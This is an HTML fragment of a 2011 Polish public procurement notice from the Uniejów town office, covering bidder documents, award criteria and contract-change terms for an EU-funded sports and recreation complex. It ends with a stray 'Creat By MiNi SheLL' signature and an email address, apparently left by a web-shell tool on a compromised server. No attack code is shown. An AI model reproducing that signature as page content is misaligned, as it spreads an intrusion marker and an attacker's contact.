<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4. Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności, poprzedzonego sporządzeniem protokołu konieczności przez Strony umowy. 
5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty (w części dotyczącej przedmiotu umowy, terminów oraz wynagrodzenia), na podstawie której dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych warunków:
1) zajdzie konieczność wprowadzenia zmian w dokumentacji projektowej, sposobie lub technologii wykonania przedmiotu umowy a zmiany te będące korzystnymi dla Zamawiającego, zarazem ułatwią lub przyspieszą wykonanie przedmiotu umowy,
2) zajdzie konieczność zmiany terminu wykonania przedmiotu zamówienia na skutek:
a) warunków atmosferycznych uniemożliwiających ze względów technologicznych wykonanie przedmiotu umowy w ustalonym terminie lub negatywnie wpływających na jakość wykonania lub trwałość przedmiotu umowy,
b) wystąpienia robót zamiennych;
c) przedłużającego się oczekiwania na uzgodnienia, decyzje administracyjne, itp.; które to nie jest zawinione przez Wykonawcę
d) działania siły wyższej;
3) zmiany zasad finansowania zamówienia;
4) zostanie stwierdzona konieczność zaniechania wykonania robót budowlanych, powodująca zmniejszenie przedmiotu umowy i wynagrodzenia o kwotę stanowiącą równoważność zaniechanych robót 
5) zmiany uwarunkowań prawnych i formalnych realizacji Kontraktu, spowodowanych działaniem osób trzecich,
6) wprowadzenia rozwiązań zamiennych, które nie wykraczając poza zdefiniowany przedmiot zamówienia i nie są traktowane jako zamówienie dodatkowe lub uzupełniające,
7) zmiany wynagrodzenia wykonawcy (ceny) o kwotę wynikającą ze zmienionych stawek podatku VAT obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy.
6. Zmiany zawartej umowy wymagają pisemnego uzasadnienia Zamawiającego;
7. Za okoliczności siły wyższej uznaje się między innymi: pożar, powódź, huragan, eksplozję, awarie energetyczne, wojnę, operacje wojskowe, rozruchy, niepokoje społeczne, ograniczenia i zakazy wydane przez organy administracji publicznej, a także inne nadzwyczajne zjawiska losowe i przyrodnicze, wszystkie z nich powstające poza kontrolą Stron, których nie można było przewidzieć w chwili zawarcia umowy, a jeżeli możliwe były do przewidzenia nie można było im zapobiec.
8. Zaistnienie siły wyższej powinno być udokumentowane przez Stronę powołującą się na nią.
9. Wstrzymanie robót z powodu określonego w ust. 5 pkt. 2 lit a musi być potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru. Wstrzymanie robót budowlanych ze względu na warunki atmosferyczne typowe (właściwe dla danej pory roku i miesiąca, lub zła organizacja robót nie uzasadnia zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://uniejow.signform.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Uniejowie, ul. Bł. Bogumiła 13, 99 - 210 Uniejów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2011 godzina 10:50, miejsce: sekretariat Urzędu Miasta w Uniejowie, ul. Bł. Bogumiła 13, 99 - 210 Uniejów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia realizowany jest w ramach Projektu pn.: Budowa kompleksu rekreacyjno -sportowego w Uniejowie - etap I. Oś priorytetowa III - Gospodarka, innowacyjność, przedsiębiorczość, działanie III.5 Infrastruktura turystyczno - rekreacyjna.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com